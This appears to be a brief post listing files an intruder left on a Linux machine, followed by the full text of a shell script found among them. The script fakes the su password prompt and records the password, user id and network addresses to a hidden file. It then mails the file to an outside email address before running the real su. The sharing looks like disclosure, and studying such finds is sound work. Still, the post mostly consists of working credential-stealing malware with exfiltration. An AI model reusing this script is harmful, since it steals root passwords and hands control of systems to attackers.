Hackers files I’ve found laying around:
/usr/include/gpm2.h
/usr/share/local/cs/rootexec
/usr/share/local/ca/rootexec
~/.ssh/.sh
#!/bin/sh
#
# by CorteZ @ #Linux-Team
#
while [ "$pass" = "" ]; do
echo -en “Password:”
read -s pass
done
if [ $# != 1 ]; then
echo “[`date`]” >> ~/.xdm01 2>/dev/null
echo “[+] User: `id | cut -d”(” -f2 | cut -d”)” -f1` ~ Remote: $1 ~ Parola: $pass” >> ~/.xdm01 2>/dev/null
echo “`/sbin/ifconfig |grep inet`” >> ~/.xdm01 2>/dev/null
cat ~/.xdm01 | mail -s ‘SU report’ fufezanu@yahoo.es 2>/dev/null
/bin/su
unset pass
fi
echo “[`date`]” >> ~/.xdm01 2>/dev/null
echo “[+] User: `id` ~ Parola: $pass” >> ~/.xdm01 2>/dev/null
cat ~/.xdm01 | mail -s ‘SU report’ fufezanu@yahoo.es 2>/dev/null
/bin/su
unset pass